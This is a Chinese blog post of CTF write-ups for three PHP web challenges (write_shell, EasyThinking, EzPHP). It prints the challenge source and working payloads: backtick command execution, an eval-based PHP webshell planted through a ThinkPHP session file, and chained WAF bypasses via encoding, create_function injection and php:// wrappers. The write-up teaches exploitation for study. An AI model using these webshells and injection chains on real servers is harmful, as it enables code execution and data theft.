[BUUCTF] 备赛刷题第四天

最新推荐文章于 2022-02-10 17:17:19 发布
最新推荐文章于 2022-02-10 17:17:19 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: CTF 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dannie01/article/details/121156776
版权

[红明谷CTF 2021]write_shell

刷题目录

源码:

<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

write_shell

绕过下划线_ 绕过eval
不能有空格 不能异或 不能取反 不能自增

利用echo+``

?action=upload&data=<?echo%09`ls%09/`?>

利用段标签 == echo

?action=upload&data=<?=`ls`?>

配合上查看路径+访问路径,会实时变化

?action=pwd

[GYCTF2020]EasyThinking

一开始看题目的时候就觉得应该是thinkphp

看到了sessionid,应该有可能是入口

后来不小心试错uri 就报错出了框架+版本thinkphp v6.0.0

拿着反序列化的payload没找到入口,key不是

发现一篇文章有同样的key点

但是32位.php一直构造不出来 也访问不到file

原来要在注册以后登录的时候修改PHPSESSID

aaaaaaaaaaaaaaaaaaaaaaaaaaaa.php

key=<?php eval($_POST[1]);phpinfo();?>

访问

/runtime/session/sess_aaaaaaaaaaaaaaaaaaaaaaaaaaaa.php

正常姿势绕过disabled function

/readflag

[BJDCTF2020]EzPHP

源码:

 <?php
highlight_file(__FILE__);
error_reporting(0); 

$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';

echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";

if($_SERVER) { 
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!<br>";
    } 
} else die('fxck you! What do you want to do ?!');

if($_REQUEST) { 
    foreach($_REQUEST as $value) { 
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
} 

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");


if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?<br>";
} else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { 
    die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else { 
    include "flag.php";
    $code('', $arg); 
} ?>

url编码绕过针对$_SERVER[‘QUERY_STRING’]的过滤

if($_SERVER) { 
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

$_SERVER['QUERY_STRING'])是不会自动urldecode的,我们可以先urlencode一次再传入,这也就是绕过原理。

URL编码脚本

#python2
def payloadURL(payload):
    str = ""
    for i in payload:
        if (i != '='):
            str += "%"+i.encode('hex')
        else:
            str += i
    return str


payload = ""  # 填payload的地方

ans = payloadURL(payload)
print(ans)

绕过/^xxx$/类型的preg_match

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!<br>";
    } 
} else die('fxck you! What do you want to do ?!');

/1nD3x.php?debu=aqua_is_cute\n
/1nD3x.php?debu=aqua_is_cute%00
/1nD3x.php?debu=aqua_is_cute%0a

%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a

绕过$_REQUEST

if($_REQUEST) { 
    foreach($_REQUEST as $value) { 
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
}

$_REQUEST方式接收请求是存在优先级别的,如果同时接受GET和POST的数据,默认情况下POST具有优先权,所以只需要在get的同时post数字即可。
这个优先级是由php的配置文件决定的,在php.ini中

; This directive determines which super global arrays are registered when PHP
; starts up. G,P,C,E & S are abbreviations for the following respective super
; globals: GET, POST, COOKIE, ENV and SERVER. There is a performance penalty
; paid for the registration of these arrays and because ENV is not as commonly
; used as the others, ENV is not recommended on productions servers. You
; can still get access to the environment variables through getenv() should you
; need to.
; Default Value: "EGPCS"
; Development Value: "GPCS"
; Production Value: "GPCS";
; http://php.net/variables-order
variables_order = "GPCS"

; This directive determines which super global data (G,P & C) should be
; registered into the super global array REQUEST. If so, it also determines
; the order in which that data is registered. The values for this directive
; are specified in the same manner as the variables_order directive,
; EXCEPT one. Leaving this value empty will cause PHP to use the value set
; in the variables_order directive. It does not mean it will leave the super
; globals array REQUEST empty.
; Default Value: None
; Development Value: "GP"
; Production Value: "GP"
; http://php.net/request-order
request_order = "GP"

这里是最致命的地方,所有的wp都不会告诉你还包含了$_COOKIE,我自己也忘记了,所以不管你怎么传payload,都会过不去这道waf

die('fxck you! I hate English!');

在这里插入图片描述抓包或者f12删掉本地cookie就可以了

同时post传参

#同时post
debu=1

file_get_contents比较内容相同

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");

一般来说可以用php://inputdata://

  • php://input是将post过来的数据全部当做文件内容
  • data://有以下几种用法
    • data://text/plain,<?php phpinfo()?>
    • data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

payload:

/1nD3x.php?file=data://text/plain,debu_debu_aqua

/1nD3x.php?debu=aqua_is_cute\n&data://text/plain,debu_debu_aqua

/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a%26%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61

#同时post
debu=1&file=1

绕过sha1比较

if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?<br>";
} else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

如果sha1()的参数为数组,将会返回false,所以sha1(Array(xxx))==sha1(Array(yyy)))

shana[]=1&passwd[]=2

/1nD3x.php?file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0A&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2

参数可以不用都url编码,只有敏感词需要,所以可以随意构造

create_function()代码注入

if(preg_match('/^[a-z0-9]*$/isD', $code) ||
    preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
    die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
    include "flag.php";
    $code('', $arg);
}

其中$code$arg可控,自然想到create_function()

$myfunc = create_function('$a, $b', 'return $a+$b;');

相当于

function myfunc($a, $b){
    return $a+$b;
}

但是如果第二个参数没有限制的话,如$code=return $a+$b;}eval($_POST['cmd']);//,就变成

function myfunc($a, $b){
	return $a+$b;
}
eval($_POST['cmd']);//}

可执行任意代码

extract($_GET["flag"]);这里我们可以进行变量覆盖,从而掌控住arg变量与code变量。
同时根据上面的介绍我们可以通过必和符号来执行自己定义的函数:

&flag[arg]=}a();//&flag[code]=create_function

拼接过后就应该是:

function {}a();//}

这个a我们是可以随时改成其他的函数的。

但是此时很多函数都被禁用了,文件中包含了flag这个文件,利用get_defined_vars()将所有变量与值都进行输出,此时payload就为:

&flag[arg]=}var_dump(get_defined_vars());//&flag[code]=create_function

/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function

就可以看到很多全局变量和值了

在这里插入图片描述
继续构造

get_defined_vars获取所有变量,配合require获得flag

过滤了include 我们可以用require
过滤了关键字,用base64编码绕过
cmVhMWZsNGcucGhw == rea1fl4g.php

flag[arg]=}require(base64_decode(cmVhMWZsNGcucGhw));var_dump(get_defined_vars());//&flag[code]=create_function

/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}require(base64_de%63%6f%64%65(cmVhMWZsNGcucGhw));var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function

define+fopen()+fgets()读文件

没ban掉fopen(),可以fgets()读取文件,但是这个文件指针需要移动就不能读取完整文件,$被禁无法定义变量

define(aaa,fopen(~(%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f),r));while(!feof(aaa))var_dump(fgets(aaa));fclose(aaa);

/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%63%6f%64%65]=create_function&%66%6c%61%67[%61%72%67]=;}define(aaa,fopen(~(%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f),r));while(!feof(aaa))var_dump(fgets(aaa));fclose(aaa);%23

php://filter伪协议读源码+取反绕过

require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php)

require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f))

/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&%66%6c%61%67%5b%61%72%67%5d=;}require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//

payload:

GET:

/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%63%6f%64%65]=create_function&%66%6c%61%67[%61%72%67]=;}define(aaa,fopen(~(%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f),r));while(!feof(aaa))var_dump(fgets(aaa));fclose(aaa);%23

POST:

debu=1&file=1

原题学习:

https://www.gem-love.com/ctf/770.html

J1A
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSP430FR6x7x_Code_Examples.zip_69XX网站_msp430_msp430fr69xx_www69x
07-14
msp430fr69xx代码示例,超详细msp430示例程序
Bean named 'rateBoardService' is expected to be of but was actually of type 'com.sun.proxy.$Proxy69'
xiaozhegaa的博客
04-07 4万+
Bean named 'rateBoardService' is expected to be of type 'xxxx' 今天在写一个测试用例的时候遇到个Bug,提示语如下: 可以只看第一行 org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'c...
Chrome 69 域名不显示 www 的解决办法
叉叉不低头
09-08 4万+
Chrome 69 域名不显示 www 的解决办法: 复制以下内容到 Chrome 地址栏,选择 Disabled 即可。 chrome://flags/#omnibox-ui-hide-steady-state-url-scheme-and-subdomains
xx-Pixiv Spider
MoltenDivineCore的博客
04-19 2万+
import requests from lxml import etree import json import os # 缺陷 1:下载的是图片合集,会下载其他角色的图片 # 缺陷 2:不能存 gif,因为P站的 gif 图片用的是我还不懂的方式 #================================================ #设置一个 Session 保持会话 se = requests.session() # E:\\0-Picture\\3-明日方舟\\鞭刃\\ # E.
PHP函数 error_reporting(E_ALL ^ E_NOTICE) 说明
weixin_34406796的博客
05-06 385
为什么80%的码农都做不了架构师?>>> ...
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
4. **避免import_request_variables()**:由于其固有的风险,尽可能避免使用此函数。 5. **使用预定义变量**:尽量使用预定义的变量(如`$_GET`、`$_POST`等)来访问HTTP请求数据,而不是直接使用全局变量。 在题目...
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF部分web题目
最新发布
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
使用telnet测试tomcat的虚拟主机时出现“ No Host matches server name www.xxx.com”的错误
Mr_Pang的专栏
07-23 4万+
出现这个错误的原因: 1.在Host的appBase指定的那个目录下的ROOT目录下没有WEB-INF文件夹,没有这个文件夹的目录是不能作为根目录的。 2.Host的appBase指定时直接指定到了ROOT目录,比如我刚开始写的是“D:\folder\ROOT”,去掉\ROOT即可。 3.修改了server.xml中的Host后,没有重启tomcat.
PHP渗透测试题目笔记
Zeker62的博客
02-10 5547
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
xxxxxxxxxxxxxxxxxxxxxxxxxxxx
热门推荐
weixin_34273481的博客
04-05 69万+
Get Authorization code:Request: https://accounts.google.com/o/oauth2/v2/auth?redirect_uri=https%3A%2F%2Fdevelopers.google.com%2Foauthplayground&prompt=consent&response_type=code&client_id=...
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5683
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
ctfshow—SSRF详解
cosmoslin的博客
09-24 1308
web 351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 前置 c
ctfshow-web爆破(web21-28)
m0_50268414的博客
11-29 1374
ctfshow-web爆破(web21-28)(updating) 文章目录ctfshow-web爆破(web21-28)(updating)web21 burp爆破web22 子域名web23 MD5web24 伪随机数web25 php mtrand()随机数生成漏洞web26 抓包web27 学生信息泄露+身份证号爆破web28 目录爆破 web21 burp爆破 题目 爆破什么的,都是基操 解 跟爆破相关,直接使用burp,因为win上的burp突然挂了,只能用kali上的先用一波,打开抓包,提
Caused by: xxxxxxxxxxxxx: error in opening zip file异常的解决
bbb2333的博客
09-18 4万+
删除maven仓库里面的jar包和相关文件 完事
文件上传漏洞详解(CTF篇)
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件上传: 文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马
『CTF Web复现』[2021 天翼杯]easy_eval
Ho1aAs‘s Blog
09-23 1139
文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完 利用点 反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值